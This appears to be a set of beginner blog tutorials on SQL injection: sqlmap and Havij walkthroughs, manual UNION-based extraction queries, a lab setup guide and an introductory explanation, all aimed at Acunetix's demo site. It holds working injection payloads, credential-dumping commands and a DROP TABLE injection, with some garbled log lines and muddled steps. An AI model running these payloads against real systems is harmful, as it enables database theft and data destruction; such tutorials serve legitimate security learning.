Sqlmap tutorial for beginners – hacking with sql injection

As we have seen in previous posts how we have successfully done SQL injection with manual queries and with the help of havij. now we will do the same exercise with a linux based tool SQLMAP. I will be using sqlmap on backtrack 5.
 

Note:- This tutorial is being carried out on demo test site provided by ACUNETIX, You can also try on the same website as discussed below.

Sqlmap

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections.

In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what all can be done with such a tool.

To understand this tutorial you should have thorough knowledge of how database driven web applications work. For example those made with php+mysql.

Vulnerable Urls

Lets say there is a web application or website that has a url in it like this

http://testphp.vulnweb.com/product.php?pic=1

and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url

http://testphp.vulnweb.com/product.php?pic=1'

We just added a single quote in the parameter. If this url throws an error or reacts in an unexpected manner then it is clear that the database has got the unexpected single quote which the application did not escape properly. So in this case this input parameter "pic" is vulnerable to sql injection.

Hacking with sqlmap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.

python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1"

The above is the first and most simple command to run with the sqlmap tool. It checks the input parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different kinds of sql injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system os, database name and version. Here is how the output might look like

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:46:25

[22:46:25] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[22:46:32] [INFO] testing connection to the target url
[22:46:46] [INFO] testing if the url is stable, wait a few seconds
[22:46:48] [INFO] url is stable
[22:46:48] [INFO] testing if GET parameter 'pic' is dynamic
[22:46:48] [INFO] confirming that GET parameter 'pic' is dynamic
[22:46:49] [INFO] GET parameter 'pic' is dynamic
[22:46:50] [INFO] heuristic test shows that GET parameter 'pic' might be injectable (possible DBMS: MySQL)
[22:46:50] [INFO] testing sql injection on GET parameter 'pic'
[22:46:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:46:58] [INFO] GET parameter 'pic' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:46:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:47:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:47:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
t to skip test payloads specific for other DBMSes? [Y/n] yd be MySQL. Do you want
[22:47:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[22:47:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[22:47:44] [INFO] checking if the injection point on GET parameter 'pic' is a false positive
 nT parameter 'pic' is vulnerable. Do you want to keep testing the others? [y/N] 
sqlmap identified the following injection points with a total of 32 HTTP(s) requests:
---
Place: GET
Parameter: pic
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 3512=3512 
---

[22:48:03] [INFO] manual usage of GET payloads requires url encoding
[22:48:03] [INFO] testing MySQL
[22:48:04] [INFO] confirming MySQL
[22:48:06] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[22:48:06] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 22:48:06

So the sqlmap tool has discovered the operating system, web server and database along with version information. Even this much is pretty impressive. But its time to move on and see what more is this tool capable of.

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

$ python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --dbs

The output could be something like this

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:52:32

[22:52:32] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[22:52:32] [INFO] resuming injection data from session file
[22:52:32] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:52:43] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pic
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 3512=3512 
---

[22:53:00] [INFO] manual usage of GET payloads requires url encoding
[22:53:00] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[22:53:00] [INFO] fetching database names
[22:53:00] [INFO] fetching number of databases
[22:53:00] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[22:53:00] [INFO] retrieved: 2
[22:53:10] [INFO] retrieved: information_schema
[22:55:42] [INFO] retrieved: acuart
available databases [2]:
[*] acuart
[*] information_schema

[22:56:41] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 22:56:41

The output shows the existing databases on the remote system.

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is 'acuart'

Command

$ python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --tables -D acuart

and the output can be something similar to this

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:57:38

[22:57:38] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[22:57:38] [INFO] resuming injection data from session file
[22:57:38] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:57:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pic
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 3512=3512 
---

[22:57:56] [INFO] manual usage of GET payloads requires url encoding
[22:57:56] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[22:57:56] [INFO] fetching tables for database: acuart
[22:57:56] [INFO] fetching number of tables for database 'acuart'
[22:57:56] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[22:57:56] [INFO] retrieved: 8
[22:58:06] [INFO] retrieved: artists
[22:59:32] [INFO] retrieved: carts
[23:00:48] [INFO] retrieved: categ
[23:01:23] [INFO] retrieved: featured
[23:02:43] [INFO] retrieved: guestbook
[23:04:33] [INFO] retrieved: pictures
[23:05:54] [INFO] retrieved: products
[23:07:01] [INFO] retrieved: users
Database: acuart
[8 tables]
+-----------+
| artists       |
| carts         |
| categ        |
| featured    |
| guestbook  |
| pictures     |
| products    |
| users         |
+-----------+

[23:07:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 23:07:56

isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is 'users' and it contains the username and password.

$ python ./sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --columns -D acuart -T users

The output can be something like this

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 23:13:34

[23:13:34] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[23:13:35] [INFO] resuming injection data from session file
[23:13:35] [INFO] resuming back-end DBMS 'mysql 5' from session file
[23:13:56] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pic
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 3512=3512 
---

[23:14:14] [INFO] manual usage of GET payloads requires url encoding
[23:14:14] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[23:14:14] [INFO] fetching columns for table 'users' on database 'acuart'
[23:14:14] [INFO] fetching number of columns for table 'users' on database 'acuart'
[23:14:14] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[23:14:14] [INFO] retrieved: 8
Database: acuart
Table: users
[8 columns]
+---------+-------------+
| Column  | Type            |
+---------+-------------+
| address | mediumtext   |
| cart      | varchar(100) |
| cc        | varchar(100) |
| email     | varchar(100) |
| name    | varchar(100) |
| pass     | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+-------------+

[23:37:09] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 23:37:08

So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part, of extracting the data from the table. The command would be

$ python ./sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --dump -D acuart -T users

The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this

+----+------------+----------------------+------------------------+------------------+---------------+---------+------------------+-----------------+
| id   | address      | cart                         | cc                             | email                  | name               | pass     | phone                |uname                |
+----+------------------------------------+-----------------------+------------------+----------------+---------+-----------------+-----------------+
| 1    | 21 street    | c47bc05e91244bc272  | 1234-5678-2300-9000  | email@email.com   | john Smith       | test      | 2323345            |test                    |
+----+------------+-----------------------+-----------------------+------------------+----------------+---------+----------------+------------------+

See here you got the login details rightaway. sqlmap will also create a csv file containing the dump data for easy analysis.

Disclaimer:- This post should be used only for the learning purposes and with the permission of the admin of the application. The admin of this blog don't hold any responsibility if the readers do any malicious activity on any third party application.

Havij... A Tool to hack the website with SQL Injection

As we have seen in our previous post that how to use Several SQL queries in the infected URL to get the database details and tables. Now the same results we can find the same results with many automated tools. One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

Supported Databases With Havij

• MsSQL 2000/2005 with error.
• MsSQL 2000/2005 no error union based
• MySQL union based
• MySQL Blind
• MySQL error based
• MySQL time based
• Oracle union based
• MsAccess union based
• Sybase (ASE)

Many of the features will not be available in free version, but still for learning purposes this tool is very useful.

Note:- This tutorial is being carried out on demo test site provided by ACUNETIX, You can also try on the same website as discussed below. 

Step1: Find SQL injection Vulnerability in tour site and insert the string (like http://testphp.vulnweb.com/product.php?pic=1) of it in Havij. Now click on the Analyze button as shown below. 

Step 1

Step 2

Step2: Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture. 
Step3: Now click on the Tables button and then click Get Tables button from below column as shown below: 
step 4: Now select any one Table and then click Get columns button as shown below: 

Step 3

Step 4

step 5: Now select desired columns and click on get data to get the result as shown below:

Step 5

Disclaimer:- This post should be used only for the learning purposes and with the permission of the admin of the application. The admin of this blog don't hold any responsibility if the readers do any malicious activity on any third party application.

SQL Injection is not a cup of cake... (2) UNION based SQL Injection

Hello Friends, as we have seen in previous post what SQL Injection is, and how it can help us in gathering some data. Now we will proceed with how many types of SQL Injection are possible. There are many kinds of SQL Injection possible i.e. around 12 to 15. Some important types are:

• Union Exploitation technique
• Boolean Exploitation technique
• Error based Exploitation technique
• Out of band Exploitation technique
• Blind SQL Injection

Today we will concentrate on UNION based SQL Injection.

Note:- This tutorial is being carried out on demo test site provided by ACUNETIX, You can also try on the same website as discussed below.

Vulnerable Urls

Lets say there is a web application or website that has a url in it like this

http://testphp.vulnweb.com/product.php?pic=1

and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url

http://testphp.vulnweb.com/product.php?pic=1'

Click on Image to enlarge it

We just added a single quote in the parameter. If this url throws an error or reacts in an unexpected manner then it is clear that the database has got the unexpected single quote which the application did not escape properly. So in this case this input parameter "pic" is vulnerable to sql injection.

# Find the number of Columns.

• We found SQL Injection Vulnerable website now it's time to find no. of Columns present in the Database.

• To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the Error message. Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown Column"

    For Example :- Change it's Order By 1,2,3,4 like below Example :-

http://testphp.vulnweb.com/product.php?pic=1 order by 1--

http://testphp.vulnweb.com/product.php?pic=1 order by 2--
http://testphp.vulnweb.com/product.php?pic=1 order by 3--  and so on...

Click on Image to enlarge it

• If you get an Error on Order by 9 that means the DB have 8 number of Columns and If u had found error on Order by 6 then the DB have 5 number of Columns. I mean if you put Order by 12 and Suppose the DB have only 11 no. of Columns then Website will show Error like this.: An error occurred  Unknown column '12' in 'order clause'.

# This trick is actually used to find the number of Columns in DB. Understand the Below example and you wil get to know.

Here, my Vulnerable website Showed Error on Order by 12 that means my Vulnerable website have 11 number of columns in it's DB. So now here I found number of columns in my DB :- Number of Columns = 11

# Find the Vulnerable Column.

Basically if the website is vulnerable then it have vulnerability in it's column and now it's time to find out that column. Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query "Union Select columns_sequence". And also change the ID Value to Negative, I mean Suppose the website have this URL product.php?pic=8 Change it to index.php?id=-8. Just put minus sign "-" before pic.

    For Eg. If the Number of Column is 11 then the query is as follow :-

http://testphp.vulnweb.com/product.php?pic=-1 union select 1,2,3,4,5,6,7,8,9,10,11--

    And Suppose above Method won't work then use below method:-

http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11--

Click on Image to enlarge it

• And Once if the Query has been Executed then it will display the number of Column.
• In the Above result, I found three vulnerable Columns 7,2,3,9 & 4. let take 2 as our tutorial. Now, as we found our vulnerable column let's proceed to the next step.

 

# Finding version, Database and User

Now this time we've to find out website Database version, User, Database Name & some other Information, Just replace Vulnerable Column no. with "version()"

For Eg. 

http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11--

And now Hit Enter : and you will  get result.

Now again do the same replace Vulnerable column with different query like :- database(), user()

Click on Image to enlarge it

Click on Image to enlarge it

 

And Suppose above Method won't work then use below method 

http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

# Finding the Table name

• Here we found vulnerable Column, DB Version name and User it's time to get Table name. If the database version is 4 or above then you gave to guess the table names (Blind SQL Injection attack)
• Let us find now Table name of the Database, Same here Replace Vulnerable Column number with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

Click on Image to enlarge it

Now hit Enter and you can see Complete Table of Database.

Great we found Table name now find the table name that is related to admin or user. as you can see in the above image there is one table name :-  users. Let us choose that table users and Go on Next step.

# Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
 
We have to convert the table name to MySql CHAR() string .
For that we need to install HackBar add-on in our Firefox Browser. Install the HackBar add-on From this link.
Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.
Select sql->Mysql->MysqlChar() in the Hackbar.

Click on Image to enlarge it

It will ask you to enter string that you want to convert to MySQLCHAR().  We want to convert the table name to MySQLChar .  In our case the table name is 'users'.

Click on Image to enlarge it

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.

Click on Image to enlarge it

Copy and paste the code at the end of the url instead of the "mysqlchar"

 http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 115)--

The above query will display the list of column. 

Click on Image to enlarge it

Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2) and replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

 http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,group_concat(users,0x3a,users),3,4,5,6,7,8,9,10,11 FROM users--

If the above query displays the 'column is not found' error, then try another column name from the list.
If we got luck, then it will display the data stored in the database depending on your column name.  For instance, username and password column will display the login credentials stored in the database.

Disclaimer:- This post should be used only for the learning purposes and with the permission of the admin of the application. The admin of this blog don't hold any responsibility if the readers do any malicious activity on any third party application.

How to create a penetration test lab in your PC...

Hello friends, as we have already started some tutorials regarding SQL Injection and later also my plan is to give several tutorials related to Application penetration testing so definitely we require some vulnerable applications for practicing. So, as an ethical hacker we should not do any kind of testing on any live application, therefor Security Professionals created some labs with many Vulnerable web apps. So if you're learner or beginner in Hacking, then I'll strongly recommend you to create this lab.

So for my practicing purposes i am using two labs DVWA and OWASP pen testing lab. 

 # What is DVWA ? (Damn Vulnerable Web App)

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. 

 # What is OWASP Penetration Testing Lab

 OWASP Penentration testing lab in also called as Top 10 Vulnerability Assessment and Practice. Basically it is created for Pen-testers and to learn about Vulnerability and Advanced Web Application Vulnerabilities components.

 # How to Install DVWA on Windows Platform

Installing DVWA on Windows platform is very easy just follow the steps given below.

• Download DVWA (Damn Vulnerable Web App) and  OWASP Pen-test lab files
• Download XAMPP server for Windows.     
• Install Xampp server on Windows     
• Extract all files from DVWA and OWASP pen test lab file to desktop.
• After all, go to C:\xampp\htdocs and delete all files from that folder and make it Empty.    
• Copy entire folder "DVWA" to "C:\xampp\htdocs".
• You can also copy mutilliade, i.e. OWASP pen test lab file to the same directory "C:\xampp\htdocs"     
• Now Start XAMPP Control Panel - Start [Apache] and [MySQL]
• Now just open your browser and type 127.0.0.1 and Hit Enter, now you can chose which application you want to run, Click on the folder and start running.
  
  
  
  
  
  

SQL Injection is not a cup of cake... (1)

What is SQL Injection:

I have gone through many SQL Injection tutorials before writing this post. One thing was common at every place, that was the queries coming from the readers. Many people doesn't know what actually SQL Injection is. They think that they can easily enter into the database and make some changes, or they can simply inject some query and will have the username and password of the administrator. Well !!! till some extent the concept is true but it is not that much easy.

So first we need to learn what is SQL Injection or better we should know what is SQL... SQL, the Structured Query Language, is the standard for accessing databases. Most web applications today use an SQL database to store persistent data for the application. It is likely that any web application you are testing uses an SQL database in the backend. Like many languages, SQL syntax is a mixture of database instructions and user data. If a developer is not careful, the user data could be interpreted as instructions, and a remote user could perform arbitrary instructions on the database. So, whenever we want any data to be accessed from any application our request goes in the form of SQL queries. Suppose for example, in any online library if we want to access any particular book then our request will go in form of following language,

 "SELECT booktitle FROM my_library WHERE " + " bookname=' " +SQLtutorial+ " ' ";

So, in the above case the application takes the bookname from the user and searches it in the TABLE named my_library and if after matching returns that particular page. So it means if that particular name doesn't match it should not return anything, but in actual scenario there is nothing stopping an attacker from injecting SQL statements in the bookname field to change the SQL query. Let’s re-examine the SQL query string.

  "SELECT booktitle FROM my_library WHERE " + " bookname=' " +SQLtutorial+ " ' ";

The code expects the bookname string to be data. However, an attacker can input any characters he or she pleases. Imagine if an attacker entered the bookname ’OR 1=1 --  then the query string would look like this:

SELECT booktitle FROM my_library WHERE " + " bookname= ' ' OR 1=1 -- '

Note:- The double dash (--) tells the SQL parser that everything to the right is a comment. 

The SELECT statement now acts much differently, because it will now return booktitle where the bookname is a zero length string (' ') or where 1=1; but 1=1 is always true! So this statement will return all the booktitle from my_library. In this case, the attacker placed SQL instructions ('OR 1=1 --) in the bookname field instead of data.

Choosing Appropriate SQL Injection Code:

To inject SQL instructions successfully, the attacker must turn the developer’s existing SQL instructions into a valid SQL statement. Generally query like these work.

• ' OR 1=1 --
• ') OR 1=1 -- 

Also, many web applications provide extensive error reporting and debugging information. For example, attempting ' OR 1=1 -- blindly in a web application often gives you an educational error message like this: 
 

Error executing query: You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right
syntax to use near 'SELECT (title, body) FROM blog_table WHERE cat='OR 1=1' at line 1

The particular error message shows the whole SQL statement. In this case, it appears that the SQL database was expecting an integer, not a string, so the injection string OR 1=1 --, without the proceeding apostrophe would work.
However, the attacker could inject other queries. For example, setting the username to this,

 ' OR 1=1; DROP TABLE user_table; --

would change this query to this,

SELECT id FROM user_table WHERE username=' ' OR 1=1; DROP TABLE user_table; -- ' AND password = PASSWORD('x');

which is equivalent to this:

SELECT id FROM user_table WHERE username=' ' OR 1=1; DROP TABLE user_table;

This statement will perform the syntactically correct SELECT statement and erase the user_table with the SQL DROP command.

So, that's all for the first tutorial of SQL Injection, in upcoming tutorials we will see more types of SQL Injections and some more commands and tools to exploit this vulnerability, till then keep practicing. 

Disclaimer:- This post should be used only for the learning purposes and with the permission of the admin of the application.